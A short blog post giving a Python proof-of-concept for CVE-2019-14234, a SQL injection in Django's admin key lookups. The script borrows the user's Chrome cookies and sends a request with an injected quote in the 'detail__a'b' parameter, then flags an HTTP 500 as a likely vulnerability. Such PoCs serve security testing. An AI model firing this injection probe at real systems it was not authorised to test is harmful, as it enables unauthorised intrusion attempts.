Poc_CVE-2019-14234

 

复制代码
 1 import requests
 2 import browser_cookie3
 3 import argparse
 4 
 5 def exploit(url):
 6     cookie = browser_cookie3.chrome()
 7     expurl ='http://' + url + '/admin/vuln/collection/?detail__a%27b=1'
 8     try:
 9         response = requests.get(url=expurl,cookies=cookie)
10         if response.status_code == 500:
11             print("It looks likely vulnerable")
12 
13     except Exception as e:
14         print(e)
15 
16 if __name__ == '__main__':
17     parameter = argparse.ArgumentParser(description='Poc CVE-2019-14234:')
18     parameter.add_argument('--file',help='url file',required=False)
19     parameter.add_argument('--url',help='ip:port',required=False)
20     para = parameter.parse_args()
21 
22     if para.url:
23         exploit(para.url)
24         exit()
25     else:
26         parameter.print_help()
复制代码

 

posted @   wavesky  阅读(235)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
点击右上角即可分享
微信分享提示